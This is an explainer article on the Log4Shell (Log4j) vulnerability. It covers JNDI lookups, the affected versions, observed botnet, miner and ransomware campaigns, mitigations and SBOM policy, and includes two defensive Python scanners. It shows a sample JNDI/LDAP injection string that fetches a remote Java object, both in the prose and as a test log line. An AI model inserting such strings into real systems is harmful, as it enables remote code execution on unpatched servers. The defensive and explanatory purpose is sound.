In November 2021, we were exposed to a major cybersecurity threat. This exploit could potentially affect millions of computers worldwide.
This is a guide to the Log4j vulnerability and how an overlooked design flaw left more than 90% of the world's computer services open to attack.
Apache Log4j is an open-source, Java-based logging utility developed by the Apache Software Foundation. Originally written by Ceki Gülcü in 2001, it is now part of Apache Logging Services, a project of the Apache Software Foundation.
Companies worldwide use the Log4j library to enable logging in their applications. In fact, the Java library is so widespread that you can find it in applications from Amazon, Microsoft, Google, and more.
The library's prominence means that a potential flaw in the code can leave millions of computers open to hacking. On November 24, 2021, a cloud security researcher working for Alibaba discovered a terrifying flaw.
The Log4j vulnerability, also known as Log4Shell, had existed unnoticed since 2013. The vulnerability allows malicious actors to run code on affected systems running Log4j. It was publicly disclosed on December 9, 2021.
Industry experts call the Log4Shell flaw the greatest vulnerability in recent memory.
In the week after the vulnerability was disclosed, cybersecurity teams detected millions of attacks. Some researchers even observed a rate of more than a hundred attacks per minute.
How does it work?
To understand why Log4Shell is so dangerous, we need to understand what it is capable of.
The Log4Shell vulnerability allows arbitrary code execution, which essentially means that an attacker can run any command or code on the target machine.
How does it accomplish this?
First, we need to understand what JNDI is.
The Java Naming and Directory Interface (JNDI) is a Java service that allows Java programs to discover and look up data and resources by name. These directory services are important because they provide an organized set of records that developers can easily use when building applications.
JNDI can use various protocols to access a given directory. One of these protocols is the Lightweight Directory Access Protocol, or LDAP.
When logging a string, Log4j performs string substitution when it encounters expressions of the form ${prefix:name}.
For example, Text: ${java:version} might be logged as Text: Java version 1.8.0_65. These substitutions are a built-in feature of Log4j.
We can also have expressions such as Text: ${jndi:ldap://example.com/file}, which uses the JNDI system to load a Java object from a URL over the LDAP protocol.
This effectively loads data from that URL into the machine. Any would-be hacker can host malicious code at a public URL and wait for machines using Log4j to log it.
Since the contents of log messages include user-controlled data, attackers can insert their own JNDI references that point to LDAP servers they control. These LDAP servers can serve malicious Java objects that JNDI will execute through the vulnerability.
What makes this worse is that it does not matter whether the application is server-side or client-side.
As long as there is a way for the logger to read the attacker's malicious code, the application remains open to exploits.
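For defenders, the ${prefix:name} form described above is also what to search for in existing logs. The following is an added example, not code from the original article or from the Log4j project: it extracts lookup expressions from log lines and reports the protocol and host of any JNDI reference. The function names and the sample log lines are assumptions constructed for illustration, and only the plain, un-nested form shown in this article is handled.

```python
import re
from urllib.parse import urlparse

# Matches the plain ${prefix:name} lookup form described in the article.
LOOKUP_RE = re.compile(r"\$\{([A-Za-z0-9]+):([^{}]*)\}")

def find_lookups(line):
    """Return (prefix, name) for every ${prefix:name} expression in a line."""
    return [(m.group(1).lower(), m.group(2)) for m in LOOKUP_RE.finditer(line)]

def jndi_targets(line):
    """Return (protocol, host) for each JNDI lookup found in a line."""
    targets = []
    for prefix, name in find_lookups(line):
        if prefix != "jndi":
            continue  # e.g. ${java:version} is a local lookup, not a remote fetch
        url = urlparse(name)
        targets.append((url.scheme.lower(), url.hostname))
    return targets

def scan(lines):
    """Return (line_number, protocol, host) for log lines carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        for protocol, host in jndi_targets(line):
            hits.append((number, protocol, host))
    return hits

# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    "INFO  request served in 12 ms",
    "WARN  login failed for user ${jndi:ldap://example.com/file}",
    "INFO  Text: ${java:version}",
]

if __name__ == "__main__":
    for number, protocol, host in scan(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup over {protocol} to {host}")
```

A hit means a lookup string reached the log; whether it was evaluated depends on the Log4j version that wrote the line.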
Who is affected?
The vulnerability affects all systems and services that use Apache Log4j, versions 2.0 up to and including 2.14.1.
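Checking deployments against that version range means looking inside application archives, because the library is usually bundled rather than installed on its own. The following is an added example, not code from the original article: it flags log4j-core jars whose version falls in the stated range, including jars nested inside other archives. The Maven-style file name log4j-core-<version>.jar is an assumption, any pre-release qualifier is ignored, and the sample archive is constructed in memory.

```python
import io
import re
import zipfile

# Affected range as stated above: 2.0 up to and including 2.14.1.
FIRST_AFFECTED, LAST_AFFECTED = (2, 0, 0), (2, 14, 1)

# Assumption: jars keep the usual Maven file name, log4j-core-<version>.jar.
JAR_RE = re.compile(r"log4j-core-(\d+)\.(\d+)(?:\.(\d+))?(?:-[\w.]+)?\.jar$")

def parse_version(name):
    """Return (major, minor, patch) from a log4j-core jar name, else None."""
    m = JAR_RE.search(name)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))

def is_affected(name):
    """True when the jar's numeric version lies inside the affected range."""
    version = parse_version(name)
    return version is not None and FIRST_AFFECTED <= version <= LAST_AFFECTED

def scan_archive(data, label):
    """List affected log4j-core jars in a jar/war, following nested archives."""
    found = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for entry in zf.namelist():
            path = f"{label}!/{entry}"
            if is_affected(entry):
                found.append(path)
            elif entry.endswith((".jar", ".war")):
                try:
                    found.extend(scan_archive(zf.read(entry), path))
                except zipfile.BadZipFile:
                    pass  # unreadable nested archive: skip it
    return found

def build_sample():
    """Constructed sample: app.war bundling a patched jar and a nested app jar."""
    inner, outer = io.BytesIO(), io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr("lib/log4j-core-2.14.1.jar", b"")
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.15.0.jar", b"")
        zf.writestr("WEB-INF/lib/app.jar", inner.getvalue())
    return outer.getvalue()

if __name__ == "__main__":
    for hit in scan_archive(build_sample(), "app.war"):
        print("affected:", hit)
```

File names can be changed by repackaging, so a clean result from a name-based scan is not proof that the library is absent.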
Many security experts suggest that the vulnerability could affect a wide range of applications that use Java.
The vulnerability was first discovered in the Microsoft-owned video game Minecraft. Microsoft urged its users to update their Java edition Minecraft software to guard against the risk.
Jen Easterly, Director of the Cybersecurity and Infrastructure Security Agency (CISA), said that vendors have a major responsibility to protect end users from malicious actors exploiting this vulnerability.
"Vendors should be communicating with their customers to ensure that end users know their product contains this vulnerability and should prioritize software updates."
Attacks have reportedly already begun. Symantec, a company that provides cybersecurity software, has observed a number of attack requests.
Here are some examples of the types of attacks that researchers have discovered:
- Botnets
Botnets are networks of computers that are under the control of a single attacking party. They help carry out DDoS attacks, steal data, and run other scams. Researchers observed the Muhstik botnet in shell scripts downloaded through the Log4j exploit.
- XMRig Miner Trojan
XMRig is an open-source cryptocurrency miner that uses CPUs to mine the Monero token. Cybercriminals can install XMRig on people's devices so they can use their processing power without their knowledge.
- Computer Ransomware
Ransomware refers to a type of malware designed to encrypt files on a computer. Attackers can then demand payment in exchange for restoring access to the encrypted files. Researchers discovered the Khonsari ransomware in Log4Shell attacks. It targets Windows servers and uses the .NET framework.
What happens next?
Experts predict it may take months or perhaps even years to fix the mess caused by the Log4j vulnerability.
This process involves updating every affected system with the patched version. Even if all these systems are patched, there is still the threat of possible backdoors that hackers may have added during the window in which the servers were open to attack.
Many solutions and mitigations exist to protect applications from being exploited through this bug. The new Log4j version 2.15.0-rc1 changes various settings to mitigate this vulnerability.
All features that use JNDI will be disabled by default, and remote lookups have been restricted as well. Disabling the lookup feature in your Log4j setup will help mitigate the risk of exploits.
Outside of Log4j, there is still a need for a broader plan to prevent open-source exploits.
In early May, the White House released an executive order that aimed to improve national cybersecurity. It included a provision for a software bill of materials (SBOM), which is essentially a formal record containing a list of every item needed to build an application.
This includes items such as open-source packages, dependencies, and APIs used for development. Although the idea of SBOMs will help with transparency, will it actually help consumers?
Upgrading dependencies can be too disruptive. Companies may simply choose to pay the fines rather than risk spending extra time finding alternative packages. Perhaps these SBOMs will only be useful if their scope is limited further.
Conclusion
The Log4j issue is more than just an industry problem for organizations.
Business leaders must be aware of the risks that can arise when their servers, products, or services rely on code that they themselves do not maintain.
Relying on open-source and third-party applications always comes with some risk. Companies should consider working out risk-mitigation strategies before new threats arrive.
Much of the web relies on open-source software maintained by thousands of volunteers worldwide.
If we want to keep the web secure, governments and companies should invest in funding open-source efforts and cybersecurity agencies such as CISA.